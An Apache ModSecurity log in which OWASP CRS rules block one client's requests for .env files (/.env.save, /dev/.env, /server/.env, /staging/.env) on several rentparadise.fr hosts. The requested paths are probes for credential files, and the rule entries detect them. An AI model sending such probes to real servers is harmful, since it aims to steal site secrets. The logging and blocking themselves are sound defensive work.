[Mon May 11 13:32:12.561575 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.rentparadise.fr"] [uri "/dev/.env"] [unique_id "agG-POJEyNRN152ArORlpAAAAEM"]
[Mon May 11 13:32:12.561758 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-POJEyNRN152ArORlpAAAAEM"]
[Mon May 11 13:32:12.567672 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.rentparadise.fr"] [uri "/dev/.env"] [unique_id "agG-PKy-5-wpj6Sx56Z0bAAAAAA"]
[Mon May 11 13:32:12.567906 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.rentparadise.fr"] [uri "/dev/.env"] [unique_id "agG-PKy-5-wpj6Sx56Z0bAAAAAA"]
[Mon May 11 13:32:12.568149 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-PKy-5-wpj6Sx56Z0bAAAAAA"]
[Mon May 11 13:32:12.572651 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.rentparadise.fr"] [uri "/dev/.env"] [unique_id "agG-PKO9RdIr1DwxYR1vZwAAAMg"]
[Mon May 11 13:32:12.572819 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.rentparadise.fr"] [uri "/dev/.env"] [unique_id "agG-PKO9RdIr1DwxYR1vZwAAAMg"]
[Mon May 11 13:32:12.573007 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-PKO9RdIr1DwxYR1vZwAAAMg"]
[Mon May 11 13:32:12.589574 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/server/.env"] [unique_id "agG-POSQ-m-m0ukSShtdnwAAAUs"]
[Mon May 11 13:32:12.589742 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/server/.env"] [unique_id "agG-POSQ-m-m0ukSShtdnwAAAUs"]
[Mon May 11 13:32:12.589927 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-POSQ-m-m0ukSShtdnwAAAUs"]
[Mon May 11 13:32:12.606911 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.rentparadise.fr"] [uri "/server/.env"] [unique_id "agG-POJEyNRN152ArORlqAAAAEM"]
[Mon May 11 13:32:12.607084 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.rentparadise.fr"] [uri "/server/.env"] [unique_id "agG-POJEyNRN152ArORlqAAAAEM"]
[Mon May 11 13:32:12.607282 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-POJEyNRN152ArORlqAAAAEM"]
[Mon May 11 13:32:12.611856 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/.env.save"] [unique_id "agG-POSQ-m-m0ukSShtdoAAAAUs"]
[Mon May 11 13:32:12.612015 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/.env.save"] [unique_id "agG-POSQ-m-m0ukSShtdoAAAAUs"]
[Mon May 11 13:32:12.612210 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-POSQ-m-m0ukSShtdoAAAAUs"]
[Mon May 11 13:32:12.616376 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.rentparadise.fr"] [uri "/server/.env"] [unique_id "agG-PKy-5-wpj6Sx56Z0cAAAAAA"]
[Mon May 11 13:32:12.616614 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.rentparadise.fr"] [uri "/server/.env"] [unique_id "agG-PKy-5-wpj6Sx56Z0cAAAAAA"]
[Mon May 11 13:32:12.616804 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-PKy-5-wpj6Sx56Z0cAAAAAA"]
[Mon May 11 13:32:12.617147 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.rentparadise.fr"] [uri "/server/.env"] [unique_id "agG-PKO9RdIr1DwxYR1vaQAAAMg"]
[Mon May 11 13:32:12.617330 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.rentparadise.fr"] [uri "/server/.env"] [unique_id "agG-PKO9RdIr1DwxYR1vaQAAAMg"]
[Mon May 11 13:32:12.617521 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-PKO9RdIr1DwxYR1vaQAAAMg"]
[Mon May 11 13:32:12.629598 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.rentparadise.fr"] [uri "/.env.save"] [unique_id "agG-POJEyNRN152ArORlqgAAAEM"]
[Mon May 11 13:32:12.629740 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.rentparadise.fr"] [uri "/.env.save"] [unique_id "agG-POJEyNRN152ArORlqgAAAEM"]
[Mon May 11 13:32:12.629908 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-POJEyNRN152ArORlqgAAAEM"]
[Mon May 11 13:32:12.639265 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.rentparadise.fr"] [uri "/.env.save"] [unique_id "agG-PKO9RdIr1DwxYR1vagAAAMg"]
[Mon May 11 13:32:12.639462 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.rentparadise.fr"] [uri "/.env.save"] [unique_id "agG-PKO9RdIr1DwxYR1vagAAAMg"]
[Mon May 11 13:32:12.639654 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-PKO9RdIr1DwxYR1vagAAAMg"]
[Mon May 11 13:32:12.640193 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.rentparadise.fr"] [uri "/.env.save"] [unique_id "agG-PKy-5-wpj6Sx56Z0cgAAAAA"]
[Mon May 11 13:32:12.640364 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.rentparadise.fr"] [uri "/.env.save"] [unique_id "agG-PKy-5-wpj6Sx56Z0cgAAAAA"]
[Mon May 11 13:32:12.640538 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-PKy-5-wpj6Sx56Z0cgAAAAA"]
[Mon May 11 13:32:12.655887 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /staging/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/staging/.env"] [unique_id "agG-POSQ-m-m0ukSShtdpAAAAUs"]
[Mon May 11 13:32:12.656067 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/staging/.env"] [unique_id "agG-POSQ-m-m0ukSShtdpAAAAUs"]
[Mon May 11 13:32:12.656264 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-POSQ-m-m0ukSShtdpAAAAUs"]
[Mon May 11 13:32:12.675174 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /staging/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.rentparadise.fr"] [uri "/staging/.env"] [unique_id "agG-POJEyNRN152ArORlrQAAAEM"]
[Mon May 11 13:32:12.675366 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.rentparadise.fr"] [uri "/staging/.env"] [unique_id "agG-POJEyNRN152ArORlrQAAAEM"]
[Mon May 11 13:32:12.675666 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-POJEyNRN152ArORlrQAAAEM"]
[Mon May 11 13:32:12.683484 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /staging/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.rentparadise.fr"] [uri "/staging/.env"] [unique_id "agG-PKO9RdIr1DwxYR1vbAAAAMg"]
[Mon May 11 13:32:12.683667 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.rentparadise.fr"] [uri "/staging/.env"] [unique_id "agG-PKO9RdIr1DwxYR1vbAAAAMg"]
